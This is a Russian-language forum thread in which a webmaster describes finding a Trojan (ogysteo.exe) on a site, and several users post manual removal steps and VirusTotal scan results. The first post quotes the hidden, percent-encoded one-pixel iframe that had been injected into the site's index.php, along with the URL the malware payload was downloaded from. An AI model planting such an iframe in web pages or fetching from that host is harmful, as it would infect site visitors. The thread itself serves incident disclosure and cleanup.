# Форум на русском языке  > Угрозы информационной безопасности  > Вредоносные программы  > Описания вредоносных программ  >  Trojan-Dropper.Win32.Agent.ays - ogysteo

## tjroot

Посвящается модераторам, администраторам сайтов, серверов…. 

Дело было так, пришел я, значит, сегодня домой и решил посмотреть на статистику и 
Страницы сайтов, которые поддерживает наша группа разработчиков (CSD group – http://www.csd.programming-security.ru) и на одном из сайтов во время загрузки перед открытием страницы зафиксировал подгрузку интересного фрейма (сайт про который идет речь – http://tvh-aliance.ru , - код уже исправлен) с забугорного сайта, Каспер – надо отдать ему должное сразу же начал материться, и распознал в открываемом фрейме- не ладное, а именно вирусное ПО (благодарности Крису). После этого инцидента проверил исходные коды страниц, скриптов, что оказалось (внимание админов и модераторов!) на заглавной странице- index.php сразу же после тега <html> перед тегом <head> имелся интересный HTML код вида:
<iframe src="http://%61%6c%65%72%74%2d%63%61.%63%6f%6d/%63%6f%75%6e%74%65%72%31/%69%6e%64%65%78.%70%68%70" width=1 height=1></iframe>
Этот милый фрейм загружал на компьютер посетителей сайта следующий файл:
http://53server.com/counter1/load.xxx - как видите адрес указан в строке….

(Админы и модераторы, проверьте, пожалуйста, все заглавные страницы на своих серверах, дабы не дать трояну распространяться по Всей сети….!)

А далее я отрубил Каспера (чтобы не мешал) загрузил вирус на компьютер и начал изучать…. Оказалось что он скрывается используя функции режима ядра, прописывает себя в реестре откуда и грузится на компьютер добропорядочный пользователей, подворовывает пароли… Дальше исследовать я его не стал… Нету времени, а удалить можно так:

Сначала в реестре в разделе HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
ищем ключ port windows, удаляем его вместе с содержимым 

после этого перезагружаемся (в обычном режиме)
Троян уже не загружен! Открываем %SystemDir% находим файло ogysteo.exe
И удаляем его руками…. Учтите куски кода останутся на машине в виде драйвера режима ядра и вирусной dll, но они будут бесполезны, я этого не стал изучать, нет времени. Если у кого будет время его поизучать вышлите пожалуйста наработки, вплоть до сырых дезассемблировок. Можем вместе повеселиться над телом несчастного вируса…..

P.S. Каспер его классифицирует как Trojan-Dropper.Win32.Agent.ays,
если выше перечисленные манипуляции не помогли и Троянов много, значит у Вас сидит Trojan.Downloader, который качает к Вам всякую нечисть в том числе и разобранный нами Троянский вирус, для излечения нужны более экзотические меры как то составление отчета о системе и отсылка его мне, вместе проанализируем, скажу что удалить, может Вы мне вышлите найденные образцы – я их обычно изучаю и пишу противоядие….

Скоро выйдет утилита для излечения от ogysteo…

Да чуть не забыл, а постоянно грузится он к Вам, даже после удаления, потому что оставляет свой "дистрибутив" в папке Temp для Вашей учетной записи пользователя, на этот дистрибутив как раз и указывает выше названный ключ в реестре....... 
Напишите в форум или вышлите на мыло название вирусного ключа в Вашем реестре, даже если ключ отличается от того что я указал Выше -
port windows, то просто откройте раздел реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
- это автоматически запускаемые программы, и внимательно взгляните на ключи со значениями подобными этому:
C:\Documents and Settings\%Название Вашей учетной записи%\Local Settings\Temp\%название вирусного "дистрибутива" - ключей загружаемых данные из папки Documents and Settings, не бывает априоре, если он есть то скорее всего его оставил для себя Троян, тем более из временной папки Temp....
Жду Ваших ответов...
С уважением к обитателям форума Сергей aka tjroot [email protected]

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## fdhert

У меня лицензионный Доктор Веб, сегодняшнего обновления, так он не ловит этот вирус ни хрена!!! Позор!!!

Избавился я сегодня от вируса примерно таким же способом.
Только вместо лазанья по реестру использую RegCleaner.

Сначала нажать Ctrl-Alt-Del, убить процесс ogysteo.
Затем удалить все содержимое папки ...\TEMP. Некоторые файлы не захотят удаляться, убить соответствующие процессы, и все равно удалить все содержимое этой папки.
Затем удалить сам ogysteo, у меня он был в Windows\System32.
Перезагрузиться, запустить RegCleaner, снести все лишнее из автозагрузки.

Перезагрузиться. Запустить RegCleaner.
Если в автозагрузке осталась лажа, обычно - пустая строка без названия программы, иногда - бред кириллицей или английские слова, повторять в разных вариациях указанные действия до тех пор, пока лажа не исчезнет и не перестанет там появляться. У меня это заняло 3 - 4 попытки.

Игор Данилов! Срочно делайте обновление!
У кого этот вирус остался - пришлите его авторам DrWeb, я свои стер.

----------


## tjroot

Наверное у тебя была другая версия данного вируса, потому что то что у меня сидело, оно скрывало свой процесс с помощью перехвата функции ZwQyerySystemInformation (я свою копию все таки изучил...), помимо всего прочего он скрывал и свои файлы, поэтому я начал с реестра, к сожалению сейчас в сети много однотипных троянов которые прячут свои процессы и файлы по сходному механизму, а вот создателям вредоносного кода не под силу спрятать свои творения и в реестре, это связано с тем что в сети 4-5 месяцев назад появились интересные мануалы и исходники по сокрытию процессов, файлов и т.д. Накачали к себе данные исходники всякие ламаки и веселятся....
Поэтому так много сходных троянов отлавливается. А вообще программистов призываю не кидаться опасными знаниями. Вирусописатели - написание антивирусного ПО - это более благородное дело,  если даже учесть всю сложность устройства антивирусного ПО. 

С уважением Сергей [email protected]

----------


## Phiolo

Спасибо, вируса больше нет! У меня тоже был ключ port windows.

----------


## tjroot

Единственное чего прошу шлите мне новые вирусы.... Которые обнаружили...... [email protected]

----------


## чайник

Удалил вручную из System32 и ссылки RegCleaner'om. Прошелся по регистру и вручную удалил все параметры со словосочетанием ogysteo.exе (таких оказалось в разных местах целых 3)

Нортон со самыми свежими обновлениями (22 ноября) пролопушился. Зато исходящие попытки этого трояна засек Аутпост  Файрволл, спасибо ему за это. При загрузке системы с трояном она вываливалась в синий экран, ковырялся тоже в Safe Mode

PS В темпе учетной записи архива не обнаружил!

----------


## tjroot

http://virusinfo.info/showthread.php?t=6940 в данном разделе форума я описал что делать с подгрузкой фреймов, даже если вы удалили вирус!

----------


## Sanja

STATUS: FINISHEDComplete scanning result of "ogysteo.exe", received in VirusTotal at 11.28.2006, 22:00:01 (CET).

Antivirus Version Update Result  
 AntiVir 7.2.0.46 11.28.2006 TR/Proxy.Small.DU.16  
 Authentium 4.93.8 11.27.2006 could be infected with an unknown virus  
 Avast 4.7.892.0 11.28.2006  no virus found  
 AVG 386 11.28.2006 Generic2.KKL  
 BitDefender 7.2 11.28.2006  no virus found  
 CAT-QuickHeal 8.00 11.28.2006 (Suspicious) - DNAScan  
 ClamAV devel-20060426 11.28.2006  no virus found  
 DrWeb 4.33 11.28.2006 Trojan.Spambot  
 eSafe 7.0.14.0 11.28.2006 suspicious Trojan/Worm  
 eTrust-InoculateIT 23.73.69 11.28.2006  no virus found  
 eTrust-Vet 30.3.3219 11.28.2006  no virus found  
 Ewido 4.0 11.28.2006  no virus found  
 Fortinet 2.82.0.0 11.28.2006 suspicious  
 F-Prot 3.16f 11.27.2006 could be infected with an unknown virus  
 F-Prot4 4.2.1.29 11.27.2006 generic  
 Ikarus 0.2.65.0 11.28.2006  no virus found  
 Kaspersky 4.0.2.24 11.28.2006 Trojan-Proxy.Win32.Small.du  
 McAfee 4906 11.28.2006  no virus found  
 Microsoft 1.1804 11.28.2006  no virus found  
 NOD32v2 1887 11.28.2006 probably unknown NewHeur_PE virus  
 Norman 5.80.02 11.28.2006  no virus found  
 Panda 9.0.0.4 11.28.2006 Suspicious file  
 Prevx1 V2 11.28.2006  no virus found  
 Sophos 4.11.0 11.16.2006  no virus found  
 TheHacker 6.0.3.124 11.27.2006  no virus found  
 UNA 1.83 11.28.2006  no virus found  
 VBA32 3.11.1 11.28.2006  no virus found  
 VirusBuster 4.3.15:9 11.28.2006 no virus found  


STATUS: FINISHEDComplete scanning result of "avz00003.dta", received in VirusTotal at 11.28.2006, 22:00:31 (CET).

Antivirus Version Update Result 
AntiVir 7.2.0.46 11.28.2006  no virus found 
Authentium 4.93.8 11.27.2006  no virus found 
Avast 4.7.892.0 11.28.2006  no virus found 
AVG 386 11.28.2006  no virus found 
BitDefender 7.2 11.28.2006  no virus found 
CAT-QuickHeal 8.00 11.28.2006  no virus found 
ClamAV devel-20060426 11.28.2006  no virus found 
DrWeb 4.33 11.28.2006  no virus found 
eSafe 7.0.14.0 11.28.2006 suspicious Trojan/Worm 
eTrust-InoculateIT 23.73.69 11.28.2006  no virus found 
eTrust-Vet 30.3.3219 11.28.2006  no virus found 
Ewido 4.0 11.28.2006  no virus found 
Fortinet 2.82.0.0 11.28.2006 suspicious 
F-Prot 3.16f 11.27.2006  no virus found 
F-Prot4 4.2.1.29 11.27.2006  no virus found 
Ikarus 0.2.65.0 11.28.2006  no virus found 
Kaspersky 4.0.2.24 11.28.2006 SpamTool.Win32.Agent.t 
McAfee 4906 11.28.2006  no virus found 
Microsoft 1.1804 11.28.2006  no virus found 
NOD32v2 1887 11.28.2006  no virus found 
Norman 5.80.02 11.28.2006  no virus found 
Panda 9.0.0.4 11.28.2006 Suspicious file 
Prevx1 V2 11.28.2006  no virus found 
Sophos 4.11.0 11.16.2006  no virus found 
TheHacker 6.0.3.124 11.27.2006  no virus found 
UNA 1.83 11.28.2006  no virus found 
VBA32 3.11.1 11.28.2006 suspected of Email-Worm.Mydoom.3 (paranoid heuristics) 
VirusBuster 4.3.15:9 11.28.2006 no virus found 

STATUS: FINISHEDComplete scanning result of "avz00002.dta", received in VirusTotal at 11.28.2006, 22:01:31 (CET).

Antivirus Version Update Result 
AntiVir 7.2.0.46 11.28.2006  no virus found 
Authentium 4.93.8 11.27.2006  no virus found 
Avast 4.7.892.0 11.28.2006 Win32:Trojano-CS 
AVG 386 11.28.2006  no virus found 
BitDefender 7.2 11.28.2006  no virus found 
CAT-QuickHeal 8.00 11.28.2006  no virus found 
ClamAV devel-20060426 11.28.2006  no virus found 
DrWeb 4.33 11.28.2006  no virus found 
eSafe 7.0.14.0 11.28.2006  no virus found 
eTrust-InoculateIT 23.73.69 11.28.2006  no virus found 
eTrust-Vet 30.3.3219 11.28.2006  no virus found 
Ewido 4.0 11.28.2006  no virus found 
Fortinet 2.82.0.0 11.28.2006  no virus found 
F-Prot 3.16f 11.27.2006  no virus found 
F-Prot4 4.2.1.29 11.27.2006  no virus found 
Ikarus 0.2.65.0 11.28.2006  no virus found 
Kaspersky 4.0.2.24 11.28.2006 SpamTool.Win32.Agent.t 
McAfee 4906 11.28.2006  no virus found 
Microsoft 1.1804 11.28.2006  no virus found 
NOD32v2 1887 11.28.2006  no virus found 
Norman 5.80.02 11.28.2006  no virus found 
Panda 9.0.0.4 11.28.2006 Suspicious file 
Prevx1 V2 11.28.2006  no virus found 
Sophos 4.11.0 11.16.2006  no virus found 
TheHacker 6.0.3.124 11.27.2006  no virus found 
UNA 1.83 11.28.2006 SpamTool.Win32.Agent.F918 
VBA32 3.11.1 11.28.2006 suspected of Email-Worm.Mydoom.3 (paranoid heuristics) 
VirusBuster 4.3.15:9 11.28.2006 no virus found 


 :Smiley:

----------


## ZAG

словил такое load.xxx на днях. NOD32 матерился на то, что файл пытается загрузиться, но было непонятно, ставил он перед фактом, что это уже произошло или тока предупреждал, но блокировал загрузку...

вчера стал перезагружаться комп.
windows port из реестра снес, но удалить, как я понимаю его приложение не удается. После рестарта в реестре автозапуска программ опять всплывает некий e349349.exe или что-то типа того, запускаемый из локальной директории пользователя.
Снос темпов IE не помог.
netstat -a -b показывает открытые сессии к почтовым сервисам hotmail, google, etc.
Видимо, не до конца гадость убил :Undecided:

----------


## pig

Тогда выполните правила.

----------

